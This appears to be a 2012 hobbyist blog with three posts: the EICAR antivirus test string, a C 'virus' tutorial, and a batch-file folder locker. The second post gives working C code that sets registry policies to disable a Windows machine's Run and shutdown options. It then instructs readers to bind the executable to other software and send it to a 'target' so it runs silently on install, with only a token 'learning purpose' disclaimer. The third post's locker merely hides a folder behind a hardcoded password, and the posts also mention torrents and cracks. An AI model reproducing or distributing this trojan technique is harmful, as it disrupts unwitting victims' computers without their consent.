on Thursday 3 May 2012
Most of us download trustable antivirus but we don't know that antivirus is in working condition or not.

There is  one group called EICAR (European Expert Group For IT Security) made our work easy for testing antivirus working or not.

Just copy and paste below line into one blank text file.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 

And save file as a .txt extension.

If your antivirus has real time protection then pop up coming that virus detected and it will say that this is EICAR test file.Otherwise manually check by right clicking on file.

More info on EICAR on this link..

Have a nice day.................
on Wednesday 2 May 2012
Ok , Friends

Today's interesting topic is how to make simple virus using c language.

I will teach you hoe to edit registry using C . And make virus which is editing target's registry.This virus disable RUN option from entire OS(Operating System) and also disable shut down option .

Just copy/paste below C code.


#include<stdio.h>
#include<conio.h>
void main()
{
   system("REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoRun /t REG_DWORD /d 1");
   system("REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoClose /t REG_DWORD /d 1");
}


Now save this file as .c extension and compile and run it using compiler like Turbo c or Code Block etc.

Compiler make .exe file.Now using one of the exebinder software bind this exe file with you software and send it to your friend or target's pc.

When target install that software , upward exe file of virus silently run and when target restart or log off computer virus will do it's work..And there is no shutdown and run option in Target's computer.

Note:This is just for learning purpose.

If you enjoyed it then plz comment or share this post..................
on Tuesday 1 May 2012
Ok , friends.

Now-a-days Copy right is important in internet world.Although there is copyleft software also.

However , If you are successful to find copyright folder locker then it may be trial version or you have to purchase it..However you can also download that software full using torrent,or you can find crack of that
software.

To get rid of this problem here is the trick to make your own folder locker using God mode in Windows.

If you don't know what is god mode in windows then here is the link.

First of all make one text file and copy & paste below code.
cls

@ECHO OFF

title Folder Private

if EXIST "lock.{ED7BA470-8E54-465E-825C-99712043E01C} " goto UNLOCK

if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "lock.{ED7BA470-8E54-465E-825C-99712043E01C} "
attrib +h +s "lock.{ED7BA470-8E54-465E-825C-99712043E01C} "
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%==yourpassword goto FAIL
attrib -h -s "lock.{ED7BA470-8E54-465E-825C-99712043E01C} "
ren "lock.{ED7BA470-8E54-465E-825C-99712043E01C} " Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
Now save file as .bat extension.
Run that file it will create folder named "Private".Now copy/paste your private data in that folder.
Then again run that file .. It will confirm that you want to lock folder or not.

Now when you want to unlock that folder, run that file again in the same folder where your "Private" folder lies.It will ask password to unlock folder.Enter password "yourpassword" without double quote . You can also change password by editing upward file.

I wish you like it ......................